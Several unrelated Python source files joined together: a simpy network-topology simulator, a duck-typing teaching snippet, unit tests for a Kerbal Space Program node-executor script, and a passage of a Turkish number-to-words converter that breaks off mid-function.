self.name = name
self.all_ports = {}
self.fabric_links = {}
self.topology = topology
self.capacity=capacity
def forward(self, port_in, packet):
next_port = packet.forward_map[port_in.name]
if next_port == None:
packet.receive()
return
if not next_port.name in port_in.links_out:
packet.failed(net_elem=port_in)
return
link = port_in.links_out[next_port.name]
port_in.send(packet=packet, link_out=link)
def add_port(self,port=None,name=None,capacity=None):
if port == None:
if capacity == None:
if self.capacity == None:
print "either the router or the port must have a capacity set to something else than None"
return None
capacity = self.capacity
port_nb = str(len(self.all_ports) + 1)
if name == None:
name =port_nb
else:
name = name + ":" + port_nb
port = Port(name=name,topology=self.topology,capacity=capacity)
port.router = self
self.all_ports[port.name] = port
for p in self.all_ports.values():
if p == port:
continue
link_name_a_b = self.name + ":" + port.name + "->" + self.name + ":" + p.name
if not link_name_a_b in self.fabric_links:
link = Link(name=link_name_a_b,capacity=min(port.capacity,p.capacity),latency=0,topology=self.topology)
self.fabric_links[link.name] = name
port.links_out[p.name] = link
p.links_in[port.name] = link
link.port_in = port
link.port_out = p
self.topology.all_links[link.name] = link
link_name_b_a = self.name + ":" + p.name + "->" + self.name + ":" + port.name
if not link_name_b_a in self.fabric_links:
link = Link(name=link_name_b_a,capacity=min(port.capacity,p.capacity),latency=0,topology=self.topology)
self.fabric_links[link.name] = name
p.links_out[port.name] = link
port.links_in[p.name] = link
link.port_in = p
link.port_out = port
self.topology.all_links[link.name] = link
return port
def __str__(self):
return self.name
def __repr__(self):
return self.__str__()
class Port:
def __init__ (self,name,topology,capacity):
self.topology = topology
self.env = topology.env
self.name = name
self.links_in = {}
self.links_out = {}
self.capacity = capacity
self.capacity_per_tick = np.round(self.capacity / self.topology.ticks_per_sec)
self.router = None
self.topology.all_ports[self.name] = self
self.in_flight = 0
self.last_period = 0
self.packets_out = []
def send(self,packet,link_out):
if self.last_period != self.topology.env.now:
self.in_flight = 0
self.last_period = self.topology.env.now
for p,l in self.packets_out:
l.put(p)
self.packets_out = []
self.packets_out.append((packet, link_out))
self.in_flight += packet.size
while self.capacity_per_tick < self.in_flight:
p = self.packets_out[np.random.randint(0, len(self.packets_out))]
self.packets_out.remove(p)
self.in_flight -= p[0].size
p[0].failed(net_elem=self)
def __str__(self):
return self.name
def __repr__(self):
return self.__str__()
class Link:
def __init__(self,name, topology, latency=0, capacity=0):
self.name = name
self.topology = topology
self.env = topology.env
self.latency = latency
self.capacity = 0
if self.capacity != 0:
self.store = simpy.Store(self.env, capacity=self.capacity)
else:
self.store = simpy.Store(self.env)
if self.env != None:
pass
#self.receive = self.env.process(self.receive())
self.port_in = None
self.port_out = None
def do_latency(self, packet):
yield self.topology.timeout(self.latency)
self.receive(packet)
def put(self, packet):
if (self.latency > 0):
self.env.process(self.do_latency(packet))
else:
self.receive(packet)
def receive(self, packet):
if self.port_in == None or self.port_in.router == None:
packet.failed(net_elem=self)
return
self.port_out.router.forward(packet=packet, port_in=self.port_out)
def __str__(self):
return self.name
class Endpoint(Router):
def __init__(self,name,topology,capacity,rate=0):
Router.__init__(self,name=name,capacity=capacity,topology=topology)
self.rate = rate
self.topology.all_routers[self.name] = self
def connect(self,router,latency=0):
if isinstance(router, basestring):
if router in self.topology.all_routers:
router = self.topology.all_routers[router]
else:
router = Router(name=router,capacity=capacity,topology=self.topology)
self.topology.all_routers[router.name] = router
self.topology.add_link(self, router, capacity=self.capacity, latency=latency)
def __str__(self):
return self.name
class Topology:
def __init__(self,name="Unknown",env=None,ticks_per_sec=100):
self.name = name
self.all_routers = {}
self.all_ports = {}
self.all_links = {}
self.tick_millis = np.round(1000 / ticks_per_sec)
self.ticks_per_sec = ticks_per_sec
self.env = env
if self.env == None:
self.env = simpy.Environment()
self.workflows = {}
def get_router(self,name):
if name in self.routers:
return self.routers[name]
else:
return None
def add_routers(self,routers):
for router in routers:
self.add_router(router = router)
def add_links(self, links):
for router_a, router_b, capacity, latency in links:
r_a = self.get_router(router_a)
if r_a == None:
print router_a, "does not exist"
return None
r_b = self.get_router(router_b)
if r_b == None:
print router_b, "does not exist"
return None
self.add_link(router_a=r_a, router_b=r_b, capacity=capacity, latency=latency)
def rtt(self, path):
latency = 0
for port in path:
if self.is_last_port(current_port=port, path=path):
break
next_port = self.next_port(current_port=port, path=path)
link = port.links_out[next_port.name]
latency += link.latency
return latency * 2
def next_port(self, current_port, path):
if not current_port in path:
return None
next_port = path[path.index(current_port) + 1]
return next_port
def is_last_port(self, current_port, path):
return path[-1] == current_port
def add_router(self, router):
if isinstance(router,basestring) and not router in self.all_routers:
router = Router(name=router, topology=self)
else:
router = self.all_routers[router]
router.topology = self
self.all_routers[router.name] = router
def add_link(self, router_a, router_b, capacity, latency):
if isinstance(router_a,basestring):
if router_a in self.all_routers:
router_a = self.all_routers[router_a]
else:
router = Router(name=router_a,capacity=capacity,topology=self)
self.all_routers[router_a] = router
router_a = router
else:
if not router_a.name in self.all_routers:
self.all_routers[router_a.name] = router_a
if isinstance(router_b,basestring):
if router_b in self.all_routers:
router_b = self.all_routers[router_b]
else:
router = Router(name=router_b,capacity=capacity,topology=self)
self.all_routers[router_b] = router
router_b = router
else:
if not router_b.name in self.all_routers:
self.all_routers[router_b.name] = router_b
port_a = router_a.add_port(name=router_a.name + "->" + router_b.name,capacity=capacity)
port_b = router_b.add_port(name=router_b.name + "->" + router_b.name,capacity=capacity)
link_a_b = Link(name = router_a.name+":"+port_a.name+"->"+router_b.name+":"+router_b.name, latency=latency, capacity=capacity,topology=self)
link_b_a = Link(name = router_b.name+":"+router_b.name+"->"+router_a.name+":"+port_a.name, latency=latency, capacity=capacity,topology=self)
port_a.links_out[port_b.name] = link_a_b
port_b.links_in[port_a.name] = link_a_b
link_a_b.port_in = port_a
link_a_b.port_out = port_b
port_b.links_out[port_a.name] = link_b_a
port_a.links_in[port_b.name] = link_b_a
link_b_a.port_in = port_b
link_b_a.port_out = port_a
self.all_links[link_a_b.name] = link_a_b
self.all_links[link_b_a.name] = link_b_a
def timeout_until_next_sec(self):
now = self.env.now * self.tick_millis
remain = (now/1000 + 1) * 1000 - now
return self.timeout(remain)
def timeout(self,millisecs):
if millisecs < self.tick_millis:
print "Cannot create timeout of ",millisecs," because tick time is too long:", self.tick_millis
return self.env.timeout(self.tick_millis)
return self.env.timeout(millisecs/self.tick_millis)
def now(self):
return self.env.now * self.tick_millis
def sim_rate(self):
real_time_stop = time.time()
simulated_time_stop = self.now()
real_time_elapse = real_time_stop - self.real_time_start
simulated_elapse = simulated_time_stop - self.simulated_time_start
return simulated_elapse, real_time_elapse,float(simulated_elapse)/(real_time_elapse*1000)
def start_simulation(self, until_sec=0, until_millis=0):
duration = 0
if until_millis > 0:
duration = until_millis
if until_sec > 0:
duration = until_sec * 1000
duration = np.ceil(duration / self.tick_millis)
self.real_time_start = time.time()
self.simulated_time_start = self.now()
print "Simulation starts",self.now()
if duration > 0:
self.env.run(until=self.env.now + duration)
else:
self.env.run()
simulated_elapse,real_time_elapse,rate = self.sim_rate()
print "Simulation stopped simulated elapse time:", simulated_elapse/1000,"real time:", real_time_elapse,"real/simulate:",rate
def schedule_workflow(self, workflow, when_sec=0, when_millis=0,delay_sec=0, delay_millis=0):
timeout = None
if when_sec > 0:
when_millis = when_sec * 1000
if when_millis > 0:
if when_millis < self.now():
print "Cannot schedule workflow in the past"
return
delay_millis = self.when_millis - self.now()
else:
if delay_sec > 0:
delay_millis = delay_sec * 1000
if delay_millis > 0:
timeout = self.timeout(delay_millis)
p = self.env.process(workflow.start())
workflow.main_process = p
self.workflows[workflow.name] = workflow
def get_graph(self):
graph = nx.Graph()
for link in self.all_links.values():
port_a = link.port_in
port_b = link.port_out
graph.add_edge(port_a,port_b)
return graph
def draw(self):
graph = self.get_graph()
pos=nx.spring_layout(graph)
nx.draw_networkx_edges(graph,pos)
nx.draw_networkx_nodes(graph,pos,node_size=100,alpha=0.5,color='b')
nx.draw_networkx_labels(graph,pos,font_size=8,font_family='sans-serif')
plt.axis('off')
plt.show()
def show_plots(self):
plt.legend()
plt.show()
|
'''
Python has something called "duck typing". It's not special, but the idea is
"If it walks like a duck and quacks like a duck, it's a duck"
Because nothing is strongly typed (like C, C++, C#, Java) you can pass anything
anywhere you want.
This is super flexible for developers, but it's also sometimes difficult to figure out
what you should be passing along.
For flexibility, see the example below. If you want to understand classes, see classes.py
first.
We will create two different classes of differnt types, than call a function on those
interfaces....and they both will work.
'''
class Orange:
def __init__(self):
self.color = "orange"
class Elephant:
def __init__(self):
self.color = "gray"
# Now we'll iterate over a list of two different objects and
# get the attribute "color". Since the both have a "color" attribute
# this works....
object_list = [Orange(), Elephant()]
for obj in object_list:
print("Type = ", type(obj), " Color = ", obj.color)
|
"""
Unit test the NodeExecutor class.
Full coverage achieved, refactoring for readability & efficiency ongoing.
"""
import unittest
from unittest.mock import patch, call
from collections import namedtuple
import sys
from NodeExecutor import NodeExecutor
class Test_environment(unittest.TestCase):
"""Test the environment to ensure it will match production."""
def test_python_version(self):
"""Make sure the python version is 3.x."""
self.assertGreaterEqual(sys.version_info[0], 3)
class Test_NodeExecutor_init(unittest.TestCase):
"""
Test the NodeExecutor class __ini__ method.
Requires a patch on the KRPC server connection for:
- active vessel
"""
def test_no_krpc_connection(self):
"""Server unreachable should raise ConnectionRefusedError."""
try:
NodeExecutor()
except Exception as e:
self.assertIsInstance(e, ConnectionRefusedError)
return
@patch('krpc.connect', spec=True)
def test_krpc_connection(self, mock_conn):
"""Check that __init__ connects to KRPC server."""
NodeExecutor()
mock_conn.assert_called_once_with(name='NodeExecutor')
@patch('krpc.connect', spec=True)
def test_init_minimum_burn_duration_no_karg(self, mock_conn):
"""Check that __init__ w/o karg sets minimum_burn_duration to 4."""
Hal9000 = NodeExecutor()
self.assertEqual(Hal9000.minimum_burn_duration, 4)
@patch('krpc.connect', spec=True)
def test_init_minimum_burn_duration(self, mock_conn):
"""Check that __init__ with minimum_burn_duration karg sets it."""
Hal9000 = NodeExecutor(minimum_burn_duration=10)
self.assertEqual(Hal9000.minimum_burn_duration, 10)
@patch('krpc.connect', spec=True)
def test_init_minimum_burn_duration_negative_value(self, mock_conn):
"""Negative value for karg should raise AssertionError."""
try:
NodeExecutor(minimum_burn_duration=-10)
except Exception as e:
self.assertIsInstance(e, AssertionError)
return
@patch('krpc.connect', spec=True)
class Test_NodeExecutor_ro_attributes(unittest.TestCase):
"""
Test the NodeExecutor class read-only attributes.
Requires a patch on the KRPC server connection for:
- active vessel
"""
def setUp(self):
"""Set up the mock objects."""
node = namedtuple('node', 'delta_v ut')
self.NODE0 = node(delta_v=10, ut=20)
self.NODE1 = node(delta_v=30, ut=40)
self.CONN_ATTR0 = {
'space_center.active_vessel.control.nodes': (self.NODE0,
self.NODE1),
'space_center.active_vessel.available_thrust': 100,
'space_center.active_vessel.specific_impulse': 200,
'space_center.active_vessel.mass': 300,
'space_center.ut': 1980}
self.CONN_ATTR1 = {
'space_center.active_vessel.control.nodes': (self.NODE1,),
'space_center.active_vessel.available_thrust': 200000,
'space_center.active_vessel.specific_impulse': 800,
'space_center.active_vessel.mass': 40000000,
'space_center.ut': 1980}
self.burn_duration0 = 29.9
self.burn_duration1 = 5988.6
def tearDown(self):
"""Delete the mock objects."""
del(self.NODE0)
del(self.NODE1)
del(self.CONN_ATTR0)
del(self.CONN_ATTR1)
del(self.burn_duration0)
del(self.burn_duration1)
def test_node(self, mock_conn):
"""Check that node is the first node from active vessel."""
control = mock_conn().space_center.active_vessel.control
with self.subTest('zero nodes'):
control.nodes = ()
Hal9000 = NodeExecutor()
self.assertEqual(Hal9000.node, None)
with self.subTest('one node'):
control.nodes = (self.NODE0,)
Hal9000 = NodeExecutor()
self.assertEqual(Hal9000.node, self.NODE0)
with self.subTest('two nodes'):
control.nodes = (self.NODE0, self.NODE1)
Hal9000 = NodeExecutor()
self.assertEqual(Hal9000.node, self.NODE0)
def test_has_node(self, mock_conn):
"""Active vessel without nodes should set has_node to False."""
control = mock_conn().space_center.active_vessel.control
with self.subTest('zero nodes'):
control.nodes = ()
Hal9000 = NodeExecutor()
self.assertEqual(Hal9000.has_node, False)
with self.subTest('one node'):
control.nodes = (self.NODE0,)
Hal9000 = NodeExecutor()
self.assertEqual(Hal9000.has_node, True)
with self.subTest('two nodes'):
control.nodes = (self.NODE0, self.NODE1)
Hal9000 = NodeExecutor()
self.assertEqual(Hal9000.has_node, True)
def test_delta_v(self, mock_conn):
"""Check that delta_v is set from the node."""
mock_conn().configure_mock(**self.CONN_ATTR0)
Hal9000 = NodeExecutor()
self.assertEqual(Hal9000.delta_v, self.NODE0.delta_v)
def test_burn_duration_at_max_thrust(self, mock_conn):
"""Node should set burn_duration_at_max_thrust."""
with self.subTest('first set of values'):
mock_conn().configure_mock(**self.CONN_ATTR0)
Hal9000 = NodeExecutor()
self.assertAlmostEqual(Hal9000.burn_duration_at_max_thrust,
self.burn_duration0, 1)
with self.subTest('second set of values'):
mock_conn().configure_mock(**self.CONN_ATTR1)
Hal9000 = NodeExecutor()
self.assertAlmostEqual(Hal9000.burn_duration_at_max_thrust,
self.burn_duration1, 1)
def test_maximum_throttle_and_burn_duration(self, mock_conn):
"""Setting minimum_burn_duration should set burn throttle, duration."""
mock_conn().configure_mock(**self.CONN_ATTR0)
with self.subTest('burn time greater than minimum'):
Hal9000 = NodeExecutor(minimum_burn_duration=self.burn_duration0/2)
self.assertEqual(Hal9000.maximum_throttle, 1)
self.assertEqual(Hal9000.burn_duration,
Hal9000.burn_duration_at_max_thrust)
with self.subTest('no minimum'):
Hal9000 = NodeExecutor(minimum_burn_duration=0)
self.assertEqual(Hal9000.maximum_throttle, 1)
self.assertAlmostEqual(Hal9000.burn_duration,
Hal9000.burn_duration_at_max_thrust)
with self.subTest('burn time less than minimum'):
Hal9000 = NodeExecutor(minimum_burn_duration=self.burn_duration0*2)
self.assertAlmostEqual(Hal9000.maximum_throttle, 0.5, 3)
self.assertEqual(Hal9000.burn_duration,
Hal9000.minimum_burn_duration)
def test_burn_ut(self, mock_conn):
"""Check that burn_ut is set properly."""
mock_conn().configure_mock(**self.CONN_ATTR0)
Hal9000 = NodeExecutor()
self.assertAlmostEqual(
Hal9000.burn_ut, self.NODE0.ut - Hal9000.burn_duration/2)
@patch('krpc.connect', spec=True)
class Test_NodeExecutor_methods(unittest.TestCase):
"""
Test the NodeExecutor public methods.
Requires a patch on the KRPC server connection for:
- active vessel
"""
def setUp(self):
"""Set up the mock objects."""
node = namedtuple(
'node', 'delta_v ut reference_frame remaining_delta_v')
self.NODE0 = node(delta_v=10, ut=2000,
reference_frame='RF', remaining_delta_v=0.1)
self.CONN_ATTRS = {
'space_center.active_vessel.control.nodes': (self.NODE0,),
'space_center.active_vessel.available_thrust': 100,
'space_center.active_vessel.specific_impulse': 200,
'space_center.active_vessel.mass': 30,
'space_center.ut': 1980}
def tearDown(self):
"""Delete the mock objects."""
del(self.NODE0)
del(self.CONN_ATTRS)
@patch('NodeExecutor.time', spec=True)
@patch('sys.stdout', spec=True)
def test_align_to_burn(self, mock_stdout, mock_time, mock_conn):
"""Check that align_to_burn sets up and engages the autopilot."""
mock_conn().configure_mock(**self.CONN_ATTRS)
Hal9000 = NodeExecutor()
auto_pilot = mock_conn().space_center.active_vessel.auto_pilot
Hal9000.align_to_burn()
with self.subTest('sets the auto_pilot attributes'):
actual_ref = auto_pilot.reference_frame
actual_dir = auto_pilot.target_direction
actual_rol = auto_pilot.target_roll
self.assertEqual(actual_ref, self.NODE0.reference_frame)
self.assertEqual(actual_dir, (0, 1, 0))
self.assertNotEqual(actual_rol, actual_rol, 'Expected NaN')
with self.subTest('engages auto_pilot & waits for alignment'):
CONN_CALLS = [call.engage(), call.wait()]
auto_pilot.assert_has_calls(CONN_CALLS)
with self.subTest('writes message to stdout'):
T0 = self.NODE0.ut - self.CONN_ATTRS['space_center.ut']
STDOUT_CALLS = [call(f'Aligning at T0-{T0:.0f} seconds')]
mock_stdout.write.assert_has_calls(STDOUT_CALLS)
@patch('sys.stdout', spec=True)
def test_warp_safely_to_burn(self, mock_stdout, mock_conn):
"""Check that warp_safely_to_burn calls warp_to() only if necessary."""
mock_conn().configure_mock(**self.CONN_ATTRS)
MARGIN = 10
Hal9000 = NodeExecutor()
BURN_UT = Hal9000.burn_ut
space_center = mock_conn().space_center
with self.subTest('node already past'):
space_center.ut = BURN_UT
Hal9000.warp_safely_to_burn(margin=MARGIN)
space_center.warp_to.assert_not_called()
mock_stdout.write.assert_not_called()
with self.subTest('node is now'):
space_center.ut = BURN_UT - MARGIN
Hal9000.warp_safely_to_burn(margin=MARGIN)
space_center.warp_to.assert_not_called()
mock_stdout.write.assert_not_called()
with self.subTest('node still in future'):
space_center.ut = BURN_UT - MARGIN - 1
Hal9000.warp_safely_to_burn(margin=MARGIN)
space_center.warp_to.assert_called_with(BURN_UT - MARGIN)
T0 = self.NODE0.ut - BURN_UT + MARGIN
STDOUT_CALLS = [call(f'Warping to T0-{T0:.0f} seconds')]
mock_stdout.write.assert_has_calls(STDOUT_CALLS)
def test_wait_until_ut(self, mock_conn):
"""Should not call time.sleep if ut already past."""
Hal9000 = NodeExecutor()
with patch('NodeExecutor.time', spec=True) as mock_time:
mock_conn().space_center.ut = 100
Hal9000.wait_until_ut(ut_threshold=10)
mock_time.sleep.assert_not_called()
with patch('time.sleep', spec=True, side_effect=StopIteration):
mock_conn().space_center.ut = 10
called = False
try:
Hal9000.wait_until_ut(ut_threshold=100)
except StopIteration:
called = True
self.assertTrue(called)
def test_burn_baby_burn(self, mock_conn):
"""Check it sets up, executes, and cleans up the burn loop."""
mock_conn().configure_mock(**self.CONN_ATTRS)
Hal9000 = NodeExecutor()
dV_left = self.NODE0.delta_v
remaining_delta_v = self.NODE0.remaining_delta_v
mock_conn().stream().__enter__().return_value = dV_left
with patch.object(NodeExecutor, '_print_burn_event'):
with patch.object(NodeExecutor, '_burn_loop'):
with patch.object(NodeExecutor, '_print_burn_error'):
with patch.object(NodeExecutor, '_cleanup'):
Hal9000.burn_baby_burn()
Hal9000._cleanup.assert_called_once_with()
Hal9000._print_burn_error.assert_called_once_with(
remaining_delta_v)
Hal9000._burn_loop.assert_called_once_with()
calls = [call('Ignition'), call('MECO')]
Hal9000._print_burn_event.assert_has_calls(calls)
def test_execute_node(self, mock_conn):
"""Should gradually approach node, and call burn_baby_burn()."""
mock_conn().configure_mock(**self.CONN_ATTRS)
Hal9000 = NodeExecutor()
with patch.object(NodeExecutor, 'burn_baby_burn'):
with patch.object(NodeExecutor, 'wait_until_ut'):
with patch.object(NodeExecutor, 'warp_safely_to_burn'):
with patch.object(NodeExecutor, 'align_to_burn'):
Hal9000.execute_node()
calls = [call(), call()]
Hal9000.align_to_burn.assert_has_calls(calls)
calls = [call(margin=180), call(margin=5)]
Hal9000.warp_safely_to_burn.assert_has_calls(calls)
Hal9000.wait_until_ut.assert_called_once_with(Hal9000.burn_ut)
Hal9000.burn_baby_burn.assert_called_once_with()
@patch('krpc.connect', spec=True)
class Test_NodeExecutor_private_methods(unittest.TestCase):
"""
Test the NodeExecutor class private methods.
Requires a patch on the KRPC server connection for:
- active vessel
"""
def setUp(self):
"""Set up the mock objects."""
node = namedtuple('node', 'delta_v ut reference_frame')
self.NODE0 = node(delta_v=10, ut=2000, reference_frame='RF')
self.CONN_ATTRS = {
'space_center.active_vessel.control.nodes': (self.NODE0,),
'space_center.active_vessel.available_thrust': 100,
'space_center.active_vessel.specific_impulse': 200,
'space_center.active_vessel.mass': 30,
'space_center.ut': 1980}
def tearDown(self):
"""Delete the mock objects."""
del(self.NODE0)
del(self.CONN_ATTRS)
def test__clamp(self, mock_conn):
"""Should clamp the value between ceiling and floor."""
Hal9000 = NodeExecutor()
values = [[-1, 0, 2, 0], [1, 2, 0, 1],
[0, -1, 1, 0], [-1, -3, -2, -2], ]
for value, floor, ceiling, result in values:
self.assertEqual(Hal9000._clamp(value, floor, ceiling), result)
def test__throttle_manager(self, mock_conn):
"""Should decrease throttle linearly towards end of burn."""
mock_conn().configure_mock(**self.CONN_ATTRS)
Hal9000 = NodeExecutor()
control = mock_conn().space_center.active_vessel.control
values = [[1, 1], [0.1, 1], [0.05, 0.5],
[0.005, 0.05], [0.001, 0.05], ]
for value, result in values:
Hal9000._throttle_manager(self.NODE0.delta_v * value)
self.assertAlmostEqual(
control.throttle, result * Hal9000.maximum_throttle)
@patch('NodeExecutor.time', spec=True)
@patch('sys.stdout', spec=True)
def test__auto_stage(self, mock_stdout, mock_time, mock_conn):
"""Should autostage if thrust drops 10% or more."""
mock_conn().configure_mock(**self.CONN_ATTRS)
Hal9000 = NodeExecutor()
vessel = mock_conn().space_center.active_vessel
control = vessel.control
VALUES = [[95, 0.79, 3.1, False],
[89, 0.84, 3.4, True],
[50, 1.00, 6.0, True],
[25, 1.00, 12.0, True], ]
for new_thrust, throttle, burn_duration, calls_made in VALUES:
with self.subTest(f'thrust_ratio: {new_thrust}%'):
mock_conn().reset_mock()
mock_stdout.reset_mock()
mock_time.reset_mock()
vessel.available_thrust = new_thrust
self.assertEqual(Hal9000._auto_stage(100), new_thrust)
self.assertAlmostEqual(Hal9000.maximum_throttle, throttle, 2)
self.assertAlmostEqual(
Hal9000.burn_duration_at_max_thrust, burn_duration, 1)
if calls_made:
control.activate_next_stage.assert_called_once_with()
mock_stdout.write.assert_has_calls(
[call(f'Staged at T0-20 seconds')])
mock_time.sleep.assert_has_calls([call(0.1), call(0.1)])
else:
mock_stdout.write.assert_not_called()
mock_time.sleep.assert_not_called()
def test__cleanup(self, mock_conn):
"""Should call disengage() on autopilot & remove() on node."""
Hal9000 = NodeExecutor()
vessel = mock_conn().space_center.active_vessel
vessel.auto_pilot.disengage.assert_not_called()
vessel.control.nodes[0].remove.assert_not_called()
Hal9000._cleanup()
vessel.auto_pilot.disengage.assert_called_once_with()
vessel.control.nodes[0].remove.assert_called_once_with()
def test__is_burn_complete(self, mock_conn):
"""Check returns True when it's time to shut down the engines."""
Hal9000 = NodeExecutor()
self.assertFalse(Hal9000._is_burn_complete(error=10))
self.assertTrue(Hal9000._is_burn_complete(error=30))
def test__print_burn_event(self, mock_conn):
"""Should print to stdout with the time to T0 appended."""
mock_conn().configure_mock(**self.CONN_ATTRS)
TEST_MSG = 'Test event happened'
STDOUT_CALLS = [call(f'Test event happened at T0-20 seconds')]
Hal9000 = NodeExecutor()
with patch('sys.stdout', spec=True) as mock_stdout:
Hal9000._print_burn_event(TEST_MSG)
mock_stdout.write.assert_has_calls(STDOUT_CALLS)
def test__burn_loop(self, mock_conn):
"""Should manage throttle during burn, with staging."""
def _false_once_then_true():
yield False
while True:
yield True
mock_conn().configure_mock(**self.CONN_ATTRS)
Hal9000 = NodeExecutor()
dV_left = 100
mock_conn().space_center.active_vessel.auto_pilot.error = 0
mock_conn().stream().__enter__().return_value = dV_left
with patch.object(NodeExecutor, '_is_burn_complete',
side_effect=_false_once_then_true(),), \
patch.object(NodeExecutor, '_throttle_manager'), \
patch.object(NodeExecutor, '_auto_stage'), \
patch.object(NodeExecutor, '_wait_to_go_around_again'):
Hal9000._burn_loop()
Hal9000._wait_to_go_around_again.assert_called_once_with()
Hal9000._auto_stage.assert_called_once_with(Hal9000.thrust)
Hal9000._throttle_manager.assert_called_once_with(dV_left)
Hal9000._is_burn_complete.assert_has_calls(
[call(dV_left), call(dV_left)])
def test__print_burn_error(self, mock_conn):
"""Check that the remaining deltaV is printed to stdout."""
mock_conn().configure_mock(**self.CONN_ATTRS)
Hal9000 = NodeExecutor()
dV_left = 0.1
STDOUT_CALLS = [
call(f'{(dV_left/Hal9000.delta_v):2.2f}% of original dV left.')]
with patch('sys.stdout', spec=True) as mock_stdout:
Hal9000._print_burn_error(dV_left)
mock_stdout.write.assert_has_calls(STDOUT_CALLS)
def test__wait_to_go_around_again(self, mock_conn):
"""Check it calls time.sleep() for 10 ms."""
Hal9000 = NodeExecutor()
with patch('NodeExecutor.time', spec=True) as mock_time:
Hal9000._wait_to_go_around_again()
mock_time.sleep.assert_called_once_with(0.01)
def test___str__(self, mock_conn):
"""Check that the __str__() method works."""
mock_conn().configure_mock(**self.CONN_ATTRS)
actual_str = str(NodeExecutor(minimum_burn_duration=10))
expect_str = 'Will burn for 10.0 m/s starting in 15.0 seconds.\n'
self.assertEqual(actual_str, expect_str)
def test___repr__(self, mock_conn):
"""Check that the __repr__() method works."""
actual_str = repr(NodeExecutor(minimum_burn_duration=10))
expect_str = 'NodeExecutor(minimum_burn_duration=10)'
self.assertEqual(actual_str, expect_str)
if __name__ == '__main__':
unittest.main()
|
# coding=utf-8
"""
Copyright 2012 Ali Ok (aliokATapacheDOTorg)
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import re
class DigitsToNumberConverter(object):
COMMA_NAME = u'virgül'
MINUS_NAME = u'eksi'
NEGATIVE_SIGN = u'-'
POSITIVE_SIGN = u'+'
FRACTION_SEPARATOR = ','
GROUPING_SEPARATOR = '.'
TURKISH_NUMBER_PATTERN = u'^[-+]?\d+(,\d)?\d*$'
TURKISH_NUMBER_REGEX = re.compile(TURKISH_NUMBER_PATTERN)
MAX_GROUP_BASE = 63
MAX_NATURAL_NUMBER_SUPPORTED = pow(10, 66) - 1
ZERO_NAME = u'sıfır'
NUMERAL_SYMBOL_NAMES = {
0: u'sıfır',
1: u'bir',
2: u'iki',
3: u'üç',
4: u'dört',
5: u'beş',
6: u'altı',
7: u'yedi',
8: u'sekiz',
9: u'dokuz',
}
TENS_MULTIPLES_NAMES = {
1: u'on',
2: u'yirmi',
3: u'otuz',
4: u'kırk',
5: u'elli',
6: u'altmış',
7: u'yetmiş',
8: u'seksen',
9: u'doksan',
}
HUNDRED_NAME = u'yüz'
THOUSAND_NAME = u'bin'
THOUSAND_POWER_NAMES = {
0: "",
1: u'bin',
2: u'milyon',
3: u'milyar',
4: u'trilyon',
5: u'katrilyon',
6: u'kentilyon',
7: u'seksilyon',
8: u'septilyon',
9: u'oktilyon',
10: u'nonilyon',
11: u'desilyon',
12: u'undesilyon',
13: u'dodesilyon',
14: u'tredesilyon',
15: u'katordesilyon',
16: u'kendesilyon',
17: u'seksdesilyon',
18: u'septendesilyon',
19: u'oktodesilyon',
20: u'novemdesilyon',
21: u'vigintilyon'
}
@classmethod
def _add_text_for_leading_zeros(cls, integer_str, word):
number_of_leading_zeros = cls._get_number_of_leading_zeros(integer_str)
for i in range(0, number_of_leading_zeros):
word = cls.ZERO_NAME + u' ' + word
return word
@classmethod
def convert_digits_to_words(cls, digits):
"""
Converts a number in digits to string representation.
>>> convert_digits_to_words('1234,0245123')
u'bin iki yüz otuz dört virgül sıfır iki yüz kırk beş bin yüz yirmi üç'
>>> convert_digits_to_words('-1.234,0245123')
u'eksi bin iki yüz otuz dört virgül sıfır iki yüz kırk beş bin yüz yirmi üç'
@type digits: str or unicode
@rtype: unicode
@raise: Exception if P{digits} is not a valid Turkish number
"""
if not digits:
return None
digits = unicode(digits)
digits = digits.replace(cls.GROUPING_SEPARATOR, '')
if not cls.TURKISH_NUMBER_REGEX.match(digits):
raise Exception(u'{} is not a valid number. The allowed pattern is : {}'.format(digits, str(cls.TURKISH_NUMBER_PATTERN)))
integer_str = None
fraction_str = None
if cls.FRACTION_SEPARATOR in digits:
integer_str = digits[:digits.find(cls.FRACTION_SEPARATOR)]
fraction_str = digits[digits.find(cls.FRACTION_SEPARATOR) + 1:]
else:
integer_str = digits
fraction_str = None
integer_part = int(integer_str)
fraction_part = int(fraction_str) if fraction_str else 0
word_integer_part = cls._convert_natural_number_to_words(abs(integer_part))
word_fraction_part = cls._convert_natural_number_to_words(fraction_part)
word_integer_part = cls._add_text_for_leading_zeros(integer_str, word_integer_part)
word_fraction_part = cls._add_text_for_leading_zeros(fraction_str, word_fraction_part) if fraction_str else word_fraction_part
if integer_part < 0:
word_integer_part = cls.MINUS_NAME + u' ' + word_integer_part
if cls.FRACTION_SEPARATOR in digits:
return u'{} {} {}'.format(word_integer_part, cls.COMMA_NAME, word_fraction_part)
else:
return word_integer_part
@classmethod
def _convert_natural_number_to_words(cls, integer_nr):
if integer_nr < 0:
raise Exception('Argument is negative : {}'.format(integer_nr))
if integer_nr > cls.MAX_NATURAL_NUMBER_SUPPORTED:
raise Exception(
'Fraction {} of the given number is larger than the maximum supported natural number: {}'.format(integer_nr, cls.MAX_NATURAL_NUMBER_SUPPORTED))
result = u''
integer_nr = abs(integer_nr)
# do it manually for words below 1000
if integer_nr < 10:
result = cls.NUMERAL_SYMBOL_NAMES[integer_nr]
elif integer_nr < 100:
tens_digit = integer_nr / 10
ones_digit = integer_nr % 10
result = u'{} {}'.format(cls.TENS_MULTIPLES_NAMES[tens_digit], cls._convert_natural_number_to_words(ones_digit) if ones_digit > 0 else u'')
elif integer_nr < 1000:
hundreds_digit = integer_nr / 100
rest = integer_nr % 100
rest_str = cls._convert_natural_number_to_words(rest) if rest > 0 else u''
if hundreds_digit == 0:
result = rest_str
elif hundreds_digit == 1:
result = u'{} {}'.format(cls.HUNDRED_NAME, rest_str)
else:
result = u'{} {} {}'.format(cls._convert_natural_number_to_words(hundreds_digit), cls.HUNDRED_NAME, rest_str)
else:
most_significant_group_base = cls._find_most_significant_group_base(integer_nr)
for i in range(most_significant_group_base / 3, 0, -1):
group_nr = cls._get_nth_group_nr(integer_nr, i)
if group_nr == 0: # don't write 'sifir milyon'
pass
